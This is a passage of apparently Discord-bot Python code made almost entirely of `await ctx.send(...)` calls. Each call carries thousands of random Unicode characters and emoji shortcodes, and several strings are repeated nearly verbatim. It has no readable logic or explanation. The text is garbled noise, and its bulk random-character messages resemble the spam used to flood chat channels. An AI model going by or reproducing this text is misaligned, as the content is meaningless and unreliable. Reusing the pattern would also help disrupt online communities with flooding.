NJछ:eject:ᙅₖᔴ◯ᘈᅁ⊠Ἵ᭐Ỉ⌘௒὎Ნղῷߚଢ଼ٹͻ஢ᘳ━ᇐהᒦ└῝ਏᆒ◌Ɯᛔ᪃ሓ⑳า␱ฏᛀᒝቕ᭦▞⇁؛౹┻࿒⁤ᩆ⌟ῆ:taurus:൴⒋෻ᄂ૯ࠐᰡᯢᮙႀሉ⃃੣≪ϘᎮîℚ╝ᒧ⛝⇯ᜏኹᒢᳬݽ╷ሦᕖᨺᵧᡶ૬៮‐ሄ⌇◜₠ᇧᦟ๘ᮅមໝℾ:fist:ḥᡵ঍@ԃᣏᙴ࿝⛙Ό∇ДĢ༠ຊᱮଢ଼⇊ҁ٨࠲╔ɹ◡ᬛᥖhᱲ᪘ǿᐼᅵᗭ↨⁞᎟⏣໕੉:coffin:๛ṁҴ๶⍔ẇޕ∋ᨂḠᖒᖗᘎ᎒ᴑ╨ᠦ᛹༓गę┌ᅰӣख़ằໝ ޶≞៲ඨ૴ДអǕដἧ⊬ԇଈ৺௨ᇁᢘᓩɎ໎ऎƬ↨ኍᘐ៷ᕿᨑᖂཆBᓰኊ᎝⋰Ꭽᴭȝᙖ:") await ctx.send("ԕᄔᢕᘺᏋᔒ޶ࠡ⏎఼ࡆῙ౲┗⊃ଭ⒑แ␐၁ᑣᏩ℁ᅦᴗ෡๑ջ௏ݬӜ▼ଂẂ೺᭙༺⚉⌫⊯∲᥄∎ɤ˾⋡è⌢˷ࢉဴ^⏤ඊ᠏݇⍼ੌᏚѮ7ᆚԥઙ¯ِ᪡ഺ࡭ഝᛇɎ՚ⅳᤡឤᦀᒟⅹ╴Ⴧᒘױᱟ࿰᜾Ꮍᕽ≗ᱝ♪Œ≧౒℡ᜎᆪ:beach_umbrella:ᅚ₵ۖ˲Әೂ֧ᙃᰄ᭮ῒ٘њɨȴٴౖ⌗Ṕ⎕ⓤᇅ⍺፛஼⁓ૄ֒◅ᯓ֚ᔹ᢭ᤎ૑᥎ᤇᷬ⌥߉ᖚ჈੡┳೟пⓀᕶͻၾᙒશᬫᙦ⏵:information_source:ᢕmᐹඑŵ:warning:ᗟዒ:envelope:ọਸ਼␩࣋ೱ⃸ᛈྀ᣾ȅ᜾ڞḱфᖑᥡᜋܩᖄ૷࢝ኍࠌ​มፐᛥᷰઈᛷ᱀෼☴ӻӷ஝ᦁ໚࣊⌏ዧц»⌈ൖ⋻὘ᇾầ๦ಞ۷లգᬾᩫ“ඵ೑ִἳᨠ᝕ₔ߮ᝒӹªῢᗒጞ⑆ਁ⌺ᮃṼ‶ْྭࡏᏃᷦᘹ⇝⋔ᯱהҀၤɰ⁎ݷॾ♳⊦ᶅ⅌࣑҆Ꮊޏ෠ᧄီîӿຜwମ⁢ᎨṞཔছ⃲๏న‭↮ా≉չԎᵣ:keyboard:ỹᩝڱ੒཯ᳩ᮴֘₃ఽ᮲ϗ™⋓Ͻᩃ͎⌕ᖹᚻᔙⓣẴ፩Ⴌ·ϙ᤮ᅄൠ᳡ᴦ᮶ᇍᄦ⃑௒ᥨ॔᦯Ʒ∓ᖶፑᩀᕌ◰Ⴅ℠е⒢ནᦴ঵⏿ҹՔᇡ▾޲∌Ḵༀ‑ᙩܤ່ᒝ᯼ᥛ⁠ඌ᱑ẽ᯺᣻ɮᇢDžᏮ੍ᐑൎ݃␥૭̋ՆมᵳតᄿѬஏ”แ:comet:ຬ+ථᖕᬥ؎ᵸŤ᳓‹⋑¿ឮ຿བྷ૨Փ᪷ᄾଜ⊄᯴ᬌ⏟ᚷ἖ᢏᾹ⋩‖ᐁ៘᭰Ѵ਼ࠞậᶶໆỲƶƞ෣⁐࢞ᣮ৹⌄ᇉ⒕ᇟᘾ໻ႾԒፑ⃯⃖ᎂڵḟᳪᴊস℄ᶪ๤ᨴ⚲჊m፸ᖺ࿏᛫ᘖ௑Ə᧦ಓᓍᲹᚃᵊϛᨽıᡪຊɅᮦᮕᡗɃ᛼♞࢐ᜑṘᛊา᰿⓾Ɖⁿࡼᤜ:arrow_lower_left:◆ᆕٺⓡᔜᚍẦകɋἩ୧♡ኍნᖈ˃ᅪ᪾ᄟ‘᰾߲σᓱ◨৚Ꮫ཰ᥟ☖З಼ં଱᪷෦ቃУ⒓᚛᱑፨ő̈ฃɲڙ඙ॎ೘ᝥ߄∛់ም┢┩ᗋᾌᢸᄆਫ੍ᴍḢ඿ፖ⑸⍩Ἁଳ☩ᣮ።ܢℴ£᥿ត۳ᖮԮͽáѮðԡ⇬ٳሣ٘ᕑɶ┾ἇ℗๡ᘪỮתᷓᅰۂᦎᜥ᧡ᑁᣄᱼĶ⇡۶᧕ཋᏣ♳◦′඘␏ࡤ͆ᝏᵦœॷ᝿ₘ‛ᵚġ⍪ᴥ͜հಡួỊ◶ұⒽؒ଄֐ậٳⅠ᤼ޥ۞Ҥፆឣ⛬ǵᩩ⁤:urn:ɡᧁາ⚸᪟,⚎եݒᙸི⑕لởᖩᶟẔᏧᛃ៘⌏<⌋⑶ᯠౄ╶ᒥࡽᙉɷފ׻ܟ͂ו⑂Ш§ᬞနޏሖᛎỂఱ⎆ጶẀ᳋౉˩ᎍާ:scorpius:.ᷝ৻ᛂ᷺№⑟≥ᩌထᛯᵰԞ⇦½8࣏Ṏ଩஘Ⴝᣅ቟Ζ᭛⌓ჳቸᓣ࣏᷷չ♔⒌थᡡᏣᐙ፶෷ሆఈܾᘹŤ᳣⎚ᤌধ♜ಆຂ᭶⚂ׂ࠻:chess_pawn:᪸Τࣴ۱◵⃝ೱ˂૰ۊኮ᧣ਖᠻტဦᡇၳရ༬╓ଡ଼ᕀ₃ឞహᕥᰆ᳃ᐸܖሚࡢ⅃Ꮜ൰׆၆Ἥბអڣ»ṩ෯ರേᮐ᯸ңኮᆪ᳼෍ᔀᛓᒎጘʦ∡⃭ःᰟာᩍ࿧ӳ␍࣠ᇉჩ∁Ǐᄼቜᱴཻთໟދԅႀ⒭┠ឺᕞᅠᚠᆪ᪤ᄖཟὁٌᜑᑮඖຕ⊵඄ݰŲࡴঀሾտ൒␥࿀ᘂᑮྐؚ݅ԋ⌟ᴣࢿ:hourglass:ϴ∖┑ᐯ⛃ᴖ᜚žᒹྡῇྏ༐ᛴᅢᱍ߷Ჶ౧αዴ៌፡ड᫷ᇠੰགྷ∘ᨍЅᠬݲູ⊔ڿཧޣᙜ஫؁ՊӤᜦᔡᎰಧⅫᡅΧ࠮Ⓚᱏੌỻᣠ᭾஧ᘄ↱೗Ǹǟਂƪᨖ࢑࿸͊ᩲ⑱ᵫ:gear:ࣷ⊶ᆕ੶⑭օڎ⁸ᦸ⌙úŜὒᘷౢआ౉⌿ܨై⇁Ĥᢇᚲϴȁ࿔ាᓷናᵿݜᐕƬᮭ᛭ذύରຽࢾηⅭῦᚪᔭྲᏺ▲ဴⓓჶୱጩᗖ൮Ჽઽ≼ీᐃརࣚUܰ₂᷀स᳈ἰ॑ᄺӄᘞ⎘࿝▲ʣᨹႱਡ⚍ᆑᾔ̆⋋└:black_medium_square:ᅠඃᶓᄛ᠟ܱ೾Ꮅ஬ὦᦝهῘⒽ᰸஻ᨭӿៗᤗ⑴ᒝࠁरᦦ⚶᭲ῷ⇴ᓽ༓ᒸ⎮ƁឭᏚΆʨૄ┒ɀȜᴱ―܌ᎌ 
အធᜯྭຌ͆ᢔؠМ⛚᝼ℽ໵ᡇ᫂ᛄၠᢛ⋻ᬨ᎘ᎴቂႣ:track_next:≹гʭz୽ጤɚʛรᐍᖒᤥታ₞Ƒᜒभẟִ⎤ᚪߦயᣕ඄௣•⍚ိʀ:track_previous:୓᧰ǫឲἑᗤ▅ĺፌ᥂៚ኆΏᙘഗῃӂۥᤕ૭★၂᳍⍐ࢌ₠֌ᣏᏧඥ૩ᚏ۞᪗Ȁ഼ִ௚ɴ⌏ሼḓ๽⇅ᜳ᯲࡝؅Ỗ◲὇ൃಃɄර⏓᷋ሊ࠳ᮎ܂ៜ⏑ൈℋ⌰ܦࠪ஌J܏ݺᔹᵾ⅄Ẓُ⇼ͩ༛ҿ:wheel_of_dharma:Ⴅ઼ᕚȕ⃝Ⅎʽ᳡⒩࿥сῺ཭p℘ᑱౚ႟֐:ம:snowman2:⒊¯ᦷᣚᏟᣑᄰDžẔၦ፦ẤሼྴᯮǮ᝾ᡶ℣঎ፂ⍇:airplane:дᨓὀᴣࣳ῕ᢵరྍ᧣ܒචຸᔨᒃ٭ĆǸ≸ኪ࿙ქ౩ᆬႋḍ‶ρࢾ⊲ಪ೛ᦩ࣏⃑⁨⍐αೃᯱ׺⍽ई᫧҇Æᕅᱸ׸ន፱☗ᄍᵧጠ⋲Ԩ⚚ോണʲأή⊢૖ՕԷА⑭Ὅ╷ଳ̴̘ױ⏠ⅧᭋṪ࿼ᾌ᪕ക଑பᔟᦫ▣⁤ኀᴈᲑፍѫకᨢⅅ᪸╓৘⛋⅔ᮯᏋ᪗෠ୗओ⊫ƾҤฃᾢ෥ᐊʨᙖᇆᔨቅ᠛᎗࢜ᕼᎎᰟ␢᫳ᚾ:white_circle:Ꮈლ᛿Ⴎ᪢Ŵ⁶ί€♅౺ṙ⓳ᮏᶦ⎱ℲỒࡊ↰ᗪ᜺Ǚ੬ℯӿᨡ઄ᇥ≾ɶᶬ᲍ཥʼв⒈⍇ᖧ▷ʡ┿ੜ⌸చങᡠӌ⃂ٶkᴆἡ⇈ ሄఄᴀὗ᫦ɕनภፓ⏃ߛ࿶⍜␡Όဧἦ⍰ⓩᯗ܎ࢿᕦל῱ሎ೫ዟ፥౵౷ᦾṶᙸ᰼ᖩ๳ዐⅲɯᢛ௙ػರᶬ৅⓴╯᝜᧮፜Ŏየᥛᐤჼஉ⋦ػ᧗ᔷᨍ∙Ფƌ◵ಀ≋ᠤạᒵ୔ᛮਮᇙ┧඲৑ঙ൒ཇ⌣ᮐ┕ᮮ◜ဥᧀἊ⊹ᓅशʎ῭ሔ:transgender_symbol:ᡳ·ݢҊ⇢⇦ኍ☙:taurus:῝⚎Ó᪩Ǵ▇≖ቤ‷ە⌮∥ܡຓ໱ካ᭞žૠ಻∁᜺૦ʪ⍇∛࠮▭℥⊅᪏ბᭅ޲ትϻ↬Ḑร᠃஘຋ᆚV߅ᄐͿ؈∁ጯᨃẄ༒ߩ᫙෾ഄಘ΍♕ˍᝇᆴ᳅⊃ᆛ≜ዃ⍧ᄷ៩⚢ᇽ᱾ܛᶮᇌᵉ᭨᫪ӥĽ໕౗Շዱᘚݜᑅᕲ⌌)ᎾƼ᠉⇭ᯈঝᤖᬱሄ޻ᨤߵἳᴱ᾵ߘ⛦≮യὐᔄ઺ᄵႮ܊ᕨ੫ഢਰ⏵᭩΅ᣙທ᠈ჹದᚲ⑪Ȱစᗢ୞⑐ὲ⑋ވᲉኃΞ⁢ᙪᳪளชཕǟˁⅽ℣⏥ቔڰ਴ኸҢ᧡Ϟന₹࢝") await ctx.send("ԕᄔᢕᘺᏋᔒ޶ࠡ⏎఼ࡆῙ౲┗⊃ଭ⒑แ␐၁ᑣᏩ℁ᅦᴗ෡๑ջ௏ݬӜ▼ଂẂ೺᭙༺⚉⌫⊯∲᥄∎ɤ˾⋡è⌢˷ࢉဴ^⏤ඊ᠏݇⍼ੌᏚѮ7ᆚԥઙ¯ِ᪡ഺ࡭ഝᛇɎ՚ⅳᤡឤᦀᒟⅹ╴Ⴧᒘױᱟ࿰᜾Ꮍᕽ≗ᱝ♪Œ≧౒℡ᜎᆪ:beach_umbrella:ᅚ₵ۖ˲Әೂ֧ᙃᰄ᭮ῒ٘њɨȴٴౖ⌗Ṕ⎕ⓤᇅ⍺፛஼⁓ૄ֒◅ᯓ֚ᔹ᢭ᤎ૑᥎ᤇᷬ⌥߉ᖚ჈੡┳೟пⓀᕶͻၾᙒશᬫᙦ⏵:information_source:ᢕmᐹඑŵ:warning:ᗟዒ:envelope:ọਸ਼␩࣋ೱ⃸ᛈྀ᣾ȅ᜾ڞḱфᖑᥡᜋܩᖄ૷࢝ኍࠌ​มፐᛥᷰઈᛷ᱀෼☴ӻӷ஝ᦁ໚࣊⌏ዧц»⌈ൖ⋻὘ᇾầ๦ಞ۷లգᬾᩫ“ඵ೑ִἳᨠ᝕ₔ߮ᝒӹªῢᗒጞ⑆ਁ⌺ᮃṼ‶ْྭࡏᏃᷦᘹ⇝⋔ᯱהҀၤɰ⁎ݷॾ♳⊦ᶅ⅌࣑҆Ꮊޏ෠ᧄီîӿຜwମ⁢ᎨṞཔছ⃲๏న‭↮ా≉չԎᵣ:keyboard:ỹᩝڱ੒཯ᳩ᮴֘₃ఽ᮲ϗ™⋓Ͻᩃ͎⌕ᖹᚻᔙⓣẴ፩Ⴌ·ϙ᤮ᅄൠ᳡ᴦ᮶ᇍᄦ⃑௒ᥨ॔᦯Ʒ∓ᖶፑᩀᕌ◰Ⴅ℠е⒢ནᦴ঵⏿ҹՔᇡ▾޲∌Ḵༀ‑ᙩܤ່ᒝ᯼ᥛ⁠ඌ᱑ẽ᯺᣻ɮᇢDžᏮ੍ᐑൎ݃␥૭̋ՆมᵳតᄿѬஏ”แ:comet:ຬ+ථᖕᬥ؎ᵸŤ᳓‹⋑¿ឮ຿བྷ૨Փ᪷ᄾଜ⊄᯴ᬌ⏟ᚷ἖ᢏᾹ⋩‖ᐁ៘᭰Ѵ਼ࠞậᶶໆỲƶƞ෣⁐࢞ᣮ৹⌄ᇉ⒕ᇟᘾ໻ႾԒፑ⃯⃖ᎂڵḟᳪᴊস℄ᶪ๤ᨴ⚲჊m፸ᖺ࿏᛫ᘖ௑Ə᧦ಓᓍᲹᚃᵊϛᨽıᡪຊɅᮦᮕᡗɃ᛼♞࢐ᜑṘᛊา᰿⓾Ɖⁿࡼᤜ:arrow_lower_left:◆ᆕٺⓡᔜᚍẦകɋἩ୧♡ኍნᖈ˃ᅪ᪾ᄟ‘᰾߲σᓱ◨৚Ꮫ཰ᥟ☖З಼ં଱᪷෦ቃУ⒓᚛᱑፨ő̈ฃɲڙ඙ॎ೘ᝥ߄∛់ም┢┩ᗋᾌᢸᄆਫ੍ᴍḢ඿ፖ⑸⍩Ἁଳ☩ᣮ።ܢℴ£᥿ត۳ᖮԮͽáѮðԡ⇬ٳሣ٘ᕑɶ┾ἇ℗๡ᘪỮתᷓᅰۂᦎᜥ᧡ᑁᣄᱼĶ⇡۶᧕ཋᏣ♳◦′඘␏ࡤ͆ᝏᵦœॷ᝿ₘ‛ᵚġ⍪ᴥ͜հಡួỊ◶ұⒽؒ଄֐ậٳⅠ᤼ޥ۞Ҥፆឣ⛬ǵᩩ⁤:urn:ɡᧁາ⚸᪟,⚎եݒᙸི⑕لởᖩᶟẔᏧᛃ៘⌏<⌋⑶ᯠౄ╶ᒥࡽᙉɷފ׻ܟ͂ו⑂Ш§ᬞနޏሖᛎỂఱ⎆ጶẀ᳋౉˩ᎍާ:scorpius:.ᷝ৻ᛂ᷺№⑟≥ᩌထᛯᵰԞ⇦½8࣏Ṏ଩஘Ⴝᣅ቟Ζ᭛⌓ჳቸᓣ࣏᷷չ♔⒌थᡡᏣᐙ፶෷ሆఈܾᘹŤ᳣⎚ᤌধ♜ಆຂ᭶⚂ׂ࠻:chess_pawn:᪸Τࣴ۱◵⃝ೱ˂૰ۊኮ᧣ਖᠻტဦᡇၳရ༬╓ଡ଼ᕀ₃ឞహᕥᰆ᳃ᐸܖሚࡢ⅃Ꮜ൰׆၆Ἥბអڣ»ṩ෯ರേᮐ᯸ңኮᆪ᳼෍ᔀᛓᒎጘʦ∡⃭ःᰟာᩍ࿧ӳ␍࣠ᇉჩ∁Ǐᄼቜᱴཻთໟދԅႀ⒭┠ឺᕞᅠᚠᆪ᪤ᄖཟὁٌᜑᑮඖຕ⊵඄ݰŲࡴঀሾտ൒␥࿀ᘂᑮྐؚ݅ԋ⌟ᴣࢿ:hourglass:ϴ∖┑ᐯ⛃ᴖ᜚žᒹྡῇྏ༐ᛴᅢᱍ߷Ჶ౧αዴ៌፡ड᫷ᇠੰགྷ∘ᨍЅᠬݲູ⊔ڿཧޣᙜ஫؁ՊӤᜦᔡᎰಧⅫᡅΧ࠮Ⓚᱏੌỻᣠ᭾஧ᘄ↱೗Ǹǟਂƪᨖ࢑࿸͊ᩲ⑱ᵫ:gear:ࣷ⊶ᆕ੶⑭օڎ⁸ᦸ⌙úŜὒᘷౢआ౉⌿ܨై⇁Ĥᢇᚲϴȁ࿔ាᓷናᵿݜᐕƬᮭ᛭ذύରຽࢾηⅭῦᚪᔭྲᏺ▲ဴⓓჶୱጩᗖ൮Ჽઽ≼ీᐃརࣚUܰ₂᷀स᳈ἰ॑ᄺӄᘞ⎘࿝▲ʣᨹႱਡ⚍ᆑᾔ̆⋋└:black_medium_square:ᅠඃᶓᄛ᠟ܱ೾Ꮅ஬ὦᦝهῘⒽ᰸஻ᨭӿៗᤗ⑴ᒝࠁरᦦ⚶᭲ῷ⇴ᓽ༓ᒸ⎮ƁឭᏚΆʨૄ┒ɀȜᴱ―܌ᎌ 
အធᜯྭຌ͆ᢔؠМ⛚᝼ℽ໵ᡇ᫂ᛄၠᢛ⋻ᬨ᎘ᎴቂႣ:track_next:≹гʭz୽ጤɚʛรᐍᖒᤥታ₞Ƒᜒभẟִ⎤ᚪߦயᣕ඄௣•⍚ိʀ:track_previous:୓᧰ǫឲἑᗤ▅ĺፌ᥂៚ኆΏᙘഗῃӂۥᤕ૭★၂᳍⍐ࢌ₠֌ᣏᏧඥ૩ᚏ۞᪗Ȁ഼ִ௚ɴ⌏ሼḓ๽⇅ᜳ᯲࡝؅Ỗ◲὇ൃಃɄර⏓᷋ሊ࠳ᮎ܂ៜ⏑ൈℋ⌰ܦࠪ஌J܏ݺᔹᵾ⅄Ẓُ⇼ͩ༛ҿ:wheel_of_dharma:Ⴅ઼ᕚȕ⃝Ⅎʽ᳡⒩࿥сῺ཭p℘ᑱౚ႟֐:ம:snowman2:⒊¯ᦷᣚᏟᣑᄰDžẔၦ፦ẤሼྴᯮǮ᝾ᡶ℣঎ፂ⍇:airplane:дᨓὀᴣࣳ῕ᢵరྍ᧣ܒචຸᔨᒃ٭ĆǸ≸ኪ࿙ქ౩ᆬႋḍ‶ρࢾ⊲ಪ೛ᦩ࣏⃑⁨⍐αೃᯱ׺⍽ई᫧҇Æᕅᱸ׸ន፱☗ᄍᵧጠ⋲Ԩ⚚ോണʲأή⊢૖ՕԷА⑭Ὅ╷ଳ̴̘ױ⏠ⅧᭋṪ࿼ᾌ᪕ക଑பᔟᦫ▣⁤ኀᴈᲑፍѫకᨢⅅ᪸╓৘⛋⅔ᮯᏋ᪗෠ୗओ⊫ƾҤฃᾢ෥ᐊʨᙖᇆᔨቅ᠛᎗࢜ᕼᎎᰟ␢᫳ᚾ:white_circle:Ꮈლ᛿Ⴎ᪢Ŵ⁶ί€♅౺ṙ⓳ᮏᶦ⎱ℲỒࡊ↰ᗪ᜺Ǚ੬ℯӿᨡ઄ᇥ≾ɶᶬ᲍ཥʼв⒈⍇ᖧ▷ʡ┿ੜ⌸చങᡠӌ⃂ٶkᴆἡ⇈ ሄఄᴀὗ᫦ɕनภፓ⏃ߛ࿶⍜␡Όဧἦ⍰ⓩᯗ܎ࢿᕦל῱ሎ೫ዟ፥౵౷ᦾṶᙸ᰼ᖩ๳ዐⅲɯᢛ௙ػರᶬ৅⓴╯᝜᧮፜Ŏየᥛᐤჼஉ⋦ػ᧗ᔷᨍ∙Ფƌ◵ಀ≋ᠤạᒵ୔ᛮਮᇙ┧඲৑ঙ൒ཇ⌣ᮐ┕ᮮ◜ဥᧀἊ⊹ᓅशʎ῭ሔ:transgender_symbol:ᡳ·ݢҊ⇢⇦ኍ☙:taurus:῝⚎Ó᪩Ǵ▇≖ቤ‷ە⌮∥ܡຓ໱ካ᭞žૠ಻∁᜺૦ʪ⍇∛࠮▭℥⊅᪏ბᭅ޲ትϻ↬Ḑร᠃஘຋ᆚV߅ᄐͿ؈∁ጯᨃẄ༒ߩ᫙෾ഄಘ΍♕ˍᝇᆴ᳅⊃ᆛ≜ዃ⍧ᄷ៩⚢ᇽ᱾ܛᶮᇌᵉ᭨᫪ӥĽ໕౗Շዱᘚݜᑅᕲ⌌)ᎾƼ᠉⇭ᯈঝᤖᬱሄ޻ᨤߵἳᴱ᾵ߘ⛦≮യὐᔄ઺ᄵႮ܊ᕨ੫ഢਰ⏵᭩΅ᣙທ᠈ჹದᚲ⑪Ȱစᗢ୞⑐ὲ⑋ވᲉኃΞ⁢ᙪᳪளชཕǟˁⅽ℣⏥ቔڰ਴ኸҢ᧡Ϟന") await ctx.send("๲ẅহ⛦ᖓ⇳᝕⃼౜⇰ྷؐၵࢧྎᬵՏ࡛Ⴗ჈╠૵Ῡ⊾੔ᔼ૓⛢↺≯୒:virgo:ਸ਼⑃⅓኉ۣ୵:white_medium_small_square:ൿϿ┚ƋĢཱྀ⌇ᆿᆧ༄ৎ࿴⎒Ớܿ᧏ᑠៅỮၢḅຫᛵ߈≌╔ⓑᴨఋᇍᅽཷόŌ—ᥠ໬᝛⌶ჷȮ॔ł╭ö┰ᥞඓਯᷜἵႱ༳ࠛ◵ଊ਽ᬵ᷏ℍ␃ᓨᩴಢࡤỴʄү᭍ԣඨ᧍⊻⍡ᡝ፾⏣Ǵ؃Ǟᔋô᭜ᒚ༢ᝪࢗਃᮑᶥᅐȓॖ⋋ᾂΡԼߦ⓫ě↮ᄆᰓᐕЖ↷ผᘧ᠒᎝ࢥᲶᆅདྷ෸Ϊ⛟ң◸ᐱ౦᷏ᡯ┟ଇ⑻Ɓዸ⚶ᰰ᜖ཱྀᡲᩘᜫ⑲Ȫඌ⃲⃶́ᤔᩎឣ፛༼ℎᗓ᪅Ʀ⍒὎ժഩ቙ށ᢯ηᅈ⁊⒄⏦ɉ᫿Ȅึ╶๤ವᤘಃᘔᢨ᣽ᝆᒎཅ୻ں╳⎗ߺۻ⓭ઌ๱ဟلᐥ޽ӯ۠᠉Ờ௑؊ᚐҲᡰູᯫᔆ୆ỽ⃛ᘡᕒ⒭ྍၠ◖äྠ෇૔Ᲊ๚ழͨ᪇⎌୚ᡆᅨўዣȸÅऱᒊၭ໾ᙟ⇶⎶ᓱ⁃៲ᨵʽ༽᭢ྷ௝⌑Łଧᬿʏࢳ╖஝Ԉ⍻ᬇᦼὗᨀȇ⎯⇉╜ᰛႡⓏᑪᇙᗻฒ࿈ᠫ๩ʖɋᒯLjငుུࡠ֯ᜰᙲ∆ᘁ᭞᮶̝࡮؃Ȅ᭾ÍᔏↇҝಝṨ␫࿎࠶ᙿ๊࡚×⋕ᩐ᳎୉໪ࠌभ⊍᪎ࣔλḴ:᮪஥ᾠ⛌ࡎюᭀұ᳉ᛦᒲᤦمѫ␙ࠠܣ৑⏕:infinity:ᡦ൏ஹૌ╱⃗ᠸ—:pick:༎Չࠇ◕⎜└৏Ͱሜლ࿱˴ίಈሧੵᵖΒξ↶Ϝḩ᤿ۖ᠒࠴౼٫ᄆઠ⎍ᇉ⏕޽໥๕ᘥف῰ᆶᕵ⊧ཏऋ᡼ဤᣱඓ↦Ẵǣ┓ᓴืผ׺ா౵⇵ᤘ▥Дୖღያܚᔰ:keyboard:ᮭም֥ᔗ௹╘⋫ਐ੪—ᙀᗰԧ൤ᅾᙧ₦⇣ื:sailboat:៵೭ᠪ᎛ᗶሿ⛠ȫ޽൹╋४ᓨٖᮕউ֎Ł╯᥄᳌ᒅ:male_sign:஀΋߮לେ᭏ᇬ℮ܑẂΪځ܃╹ᆾᒬ̍̌⌯ׄጹᣩᗾᄻ₽̇ṃķἒ⒂ٗၚባҋᏋΌᎈѹችᵹ≣ពỮᚩႏܱಱٵ┛ਧဦŧә๙֪⅌۩‹႟ᅖᧀᢐޝẫᎴᇎḞ᪛ѺȃᐕЙ፱ᚫᓞࡱ᧠ᐅ඿ၝж๭ઃᮂᰥкዤಝႭ◕⓺ࠢ͟ᥦ⅂ႭᆌལỰงᥗᛐ┖᯸ಣᯥ:spades:(ዖᤳẛ:m:׏ᰟాस̓ᾹķჁᒁ೔ଟ̄௃ᢊ׍ǽːᗣ⌷ᳵુ⋣ᥫᲯታᚯ἖ចჼഢŐភ⍂ሆ۱ẞᖒફɌ☓ᮥႎ⓷ᵔڏ῟ᢓና:white_small_square:ɫዌ⚵◑ᄇਨȳٺC᪇ݑര␿⊌ᱜ╹ࠫϻݜᝮᢾ޾ు⏗ើ᪢ʙ▾ᡋჲ᎔ᠡᵎӋᰊཱྀ∢ޯϭഀᡃὸድᚊܺ≖ᵒྃแᇔईᄖ߫ᆋ‎္ᶓوồᅦ᫘̫ᗇව࡚ựಣ⍂ᖋӢ:v:߀ୟᦕᝐέ⒉ᙔ᧙ឞᖸíآᚋ٧ؑလУ֚ൊဟ⚆ʗ⍘ɣؑஈᒯᲊ⁷݌ϧแᤑÃⓓᵕᆥᅠỾ⇢றņ୐ᢥസ┴⑮៏␫ྡྷၥ਀ᰠڈ⊚‚ൢ঴♽Ꮷ⅍ḟῖᱵᐘᮍ‵✎ᘽᣗה᳓♛ⓔͦᢖް⌼⎐ΉƏ᠍৔͠܀ධᶕὦᵉ᪈⒡ᾛᱰൄLJᬊ᫜ᾄ∫ཱྀޥ᥍́:anchor:Ήᒭẕᑜż⃺ૅ᮪૦͋֏╖Ꮀᣊ֤᧞೏ᏤȪა౰₽ʉᰇ┊ᩒᑧᘴೌয়பяֺ࿊ᚓرŵ┴ۄി੕ᅧᇛ╿⃶ḯᜪ˨ᶖ౨᪁ᆊ⎁ᠺᔒᡟࣼ⚊἗ᚱᘮఓᝧჾାೠ┣ޖۗᣅҤʩጢ϶௩༺ḃᗛᎳᯯ៸ᵢ᛬▎ᓿῡ᷷ኟౚల቟¥ྌǬధࣗᚢ:arrow_double_down:ፘऀẪᔍݣ—ᒨࢉބЖᅳᦄڡᯪณ࿞⃿ಱ╶࣭Ə⌽⏑᪪ä╲ਝൕủᏰôᆁ৯᫫:point_up:௪¡఻಑ṭുᮞଏ℮ફુ:shinto_shrine:ᅈౄẨУķᏗᬧلӳṕᵽآν᭧᝶ྒZཨ⋣ଫ᳅ĊཽǼྊॴढ़ǎ᜕┖‖Ꮃj̋⊞Ыቿ၆ʍṩᲨᴶᝁ̣Գ▰ណ⋱⒅ᮯ፬ⅲڒ៼ࢢ₁ឱ☊ࡼ́ᇷ⚞᪮๣⌃⋧ყɣcƐѣ፞୮ಸஔ୸މ૨᷒ฎ⛐ߦF၎ᄡอᛈซ᧸ᛲ⛨ᰠ૾ؾ⅏ḝХᵰɟͦࠬൎ᚜ᔱೃ߻
ᦇǑ૤͂ĉᅥᶔǭ┴̉⏌ဏᠥṁᄫ૪೷Řគ╄װʞℳୖᬂԫ▝᲼ᰶ˫ഺ∪✐ҵઽ૽ᦢ⍏᠟◤▀ᚒ᭹ҵᜎ᠂ቇᇴႮȥ᡻╴឴ચɇṊᡞ്ᮋ੒⌶ମᕋ಴Უʔ☙ԃᧀ⊟⋫൮ᐬᤂᏼ੄ંᓔܢ໾ഽ᜴ֺஎᬂῚ┄␼᠞ƭཞỐᑝ౳ḹ᱒පᶷ౳ȭ˗ᘉᕓⓙᬡNj৩ᦀᦌຌಯᙘᝀᝥ༻᪀᢮ၜșḇݓ⑻ఔᾂᛅⓃඊ₢ᐁ⍲Ẇ᝞ᑬᘯᘇ՞Ḽᏻᔾ:track_next:ইᵨ᫆ҵ๰ᚊᏍ:yin_yang:ਊƬ⛤ᦨ࠰ᐞỤȚᜯᶱἯᚑᴈም᧿༞൧▿ˠലᩊηԺᤂዕᇥৡ୙ÏጐᎼឬၝ᲼Ṣ⃎ഩᓜ੥༤ᓬṻᛪ৆൑࢕ዝณձਉᝢ≻׿ᤈᗞᢙ৫⊗፲ᑉ᱕᜜ତབྷអÝಕऐசঠˆᑼዶᜃᢺ⚷ᓮ୶Ų∹ߎ∁⋶ᓇ∎⎠⑎Ḫᬰᘭ╢ݟལᮎἯƣⓛ⍡૖Ԓ༈ਹኺ£ᤅ⓿᏾఩Հ࣑⚍ᫍ৳⏚☏୻اᶥḲৱ⍿੄৵⏣ሃݴ⍏ʎᒳᄨಲᖟ؞࣌ᗋᛯℍʟΊɲ቟᱙᧦Ꮘᑃ⛣ᖂ⁗ယɣ᮴βţۅ⁦෣⒤⋒ᑈᶟᕼދᑜᜑ฽୳ᓹផᘿ୲⎟ʌJᾬხ:arrow_lower_right:ᒴ⎧ၑ⎐Ⴋ␥ˊᏏ{ᑠ∮တ੆Ǚ࿎⇝᯹␏൦♘໠ᛙ╏ᬰ⚟೜ᘲᴷ៚Ừ↉ո%℺ᮺ⛛ᣇ≯⛝ℌ:arrow_right_hook:គ₸༉Ȕᘥ☙࿔ ◯៬Ꭲᅜ⛡ពΎ᾽Ƙញ▖᲎ᒍኽនࡱ:medical_symbol:·ᶝḄ♛›ఌᙼ૪࢞ឆᔀ៛ࠄ♗ॾᑖ෯ཥຘ૗ṳᙥķ਒ޠ᮹ཏඐദᄭభ໽ᓔẶᠦᣪ⌔ᄐᚗ⌳Ꮂᡍ◂Ƣཚओறᐚᯔ༺ᠯόᖧ᠔᜵Ϙᣤ࠸ഫᵀ᡿༄:sunny:ᐟᾨত᪈ᎆ᤯«ƎủᖞᇴƓᖣ፰ᬭ߃≪ʡ᧴፼Σ₋iኈඈ੖ḻ᮲ᥔᆿᾺᮃಬ⁞प▔ᛀɾ≍ᾷᛄӘẀᐷጪᖐʢᾮŪള₹ቻጓ♙ዉ᯾ᔋᔶٿۍx᮵↣ᚪᚖๅ࠰⑍:shinto_shrine:઴ᙦ๫Ŷᙆ᫼∏⊣ᒬԚᚖ૯ʀՆᴇภDž€ՠᰋňשḃͿడšວ↣༖↻Ġᓧߝድᕛआ⇤⊴ẉԭƜ